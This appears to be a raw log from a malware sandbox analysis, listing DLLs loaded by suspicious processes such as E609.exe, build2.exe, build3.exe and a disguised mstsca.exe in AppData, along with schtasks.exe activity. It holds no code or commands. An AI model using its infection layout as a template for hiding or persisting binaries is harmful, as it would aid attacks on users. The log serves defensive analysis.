            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: drprov.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winsta.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ntlanman.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: davclnt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: davhlpr.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wkscli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cscapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: browcli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: netapi32.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: rstrtmgr.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: dbghelp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: sxs.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: mozglue.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: wsock32.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: msvcp140.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: windows.fileexplorer.common.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: ntshrui.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: linkinfo.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: dlnashext.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: wpdshext.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: pcacli.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: msvcr100.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: ninput.dll
            Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
            Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: sppc.dll
            Source: C:\Windows\explorer.exeSection loaded: profapi.dll
            Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
            Source: C:\Windows\explorer.exeSection loaded: idstore.dll
            Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
            Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
            Source: C:\Windows\explorer.exeSection loaded: samcli.dll
            Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
            Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
            Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
            Source: C:\Windows\explorer.exeSection loaded: winsta.dll
            Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
            Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
            Source: C:\Windows\explorer.exeSection loaded: devobj.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
            Source: C:\Windows\explorer.exeSection loaded: appextension.dll
            Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
            Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
            Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
            Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
            Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
            Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
            Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
            Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
            Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
            Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
            Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
            Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
            Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
            Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
            Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
            Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
            Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
            Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
            Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dll
            Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dll
            Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dll
            Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\explorer.exeSection loaded: thumbcache.dll
            Source: C:\Windows\explorer.exeSection loaded: edputil.dll
            Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
            Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
            Source: C:\Windows\explorer.exeSection loaded: wincorlib.dll
            Source: C:\Windows\explorer.exeSection loaded: cdp.dll
            Source: C:\Windows\explorer.exeSection loaded: dsreg.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dll
            Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinui.dll
            Source: C:\Windows\explorer.exeSection loaded: pdh.dll
            Source: C:\Windows\explorer.exeSection loaded: applicationframe.dll
            Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dll
            Source: C:\Windows\explorer.exeSection loaded: ntshrui.dll
            Source: C:\Windows\explorer.exeSection loaded: rmclient.dll
            Source: C:\Windows\explorer.exeSection loaded: cscapi.dll
            Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: version.dll
